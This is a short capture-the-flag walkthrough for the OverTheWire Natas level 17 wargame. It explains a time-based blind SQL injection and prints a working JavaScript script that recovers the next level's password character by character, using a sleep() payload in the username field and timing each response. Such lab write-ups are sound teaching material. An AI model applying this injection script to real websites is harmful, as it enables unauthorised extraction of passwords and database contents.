Natas Level 17

natas level 17 msg

Our username check is back, and this time it’s not telling us anything:

natas level 17 source

It looks like they forgot to uncomment all the messages before they published this file.  That’s ok, we can take the same strategy as the other blind sql level, and use an if statement combined with the sleep() function to tell us if we have the correct character.  In the code below, execution will be halted for two seconds if we have the correct character.  We time the length of execution, if it is greater than 2000 milliseconds (2 seconds) we know we have the right character and move on to the next index:

var start = new Date().getTime();
var end = new Date().getTime();
string = "";
for (j = 1; j < 33; j++)  {
    for(i = 48; i < 123; i++) { //123
        if (i > 57 && i < 65) { continue; }
        if (i > 90 && i < 97) { continue; }
        query = 'username=natas18" and if(binary(SUBSTRING(password,' + j + ', 1)) = "' + String.fromCharCode(i) + '", sleep(2), 0) and "1" = "1';
        start = new Date().getTime();  //start timing
        xhr = new XMLHttpRequest();
        xhr.open("POST", "http://natas17.natas.labs.overthewire.org/index.php", false);
        xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
        xhr.send(query);
        console.log(query);
        console.log(string);
        end = new Date().getTime();  //end timing
        if (end - start > 2000) {
            console.log(String.fromCharCode(i));
            //console.log(xhr.response);
            string += String.fromCharCode(i);
            break;
        }
    }
}
console.log(string);

You may have to increase the sleep time if your internet connection is slow:

natas level 17 win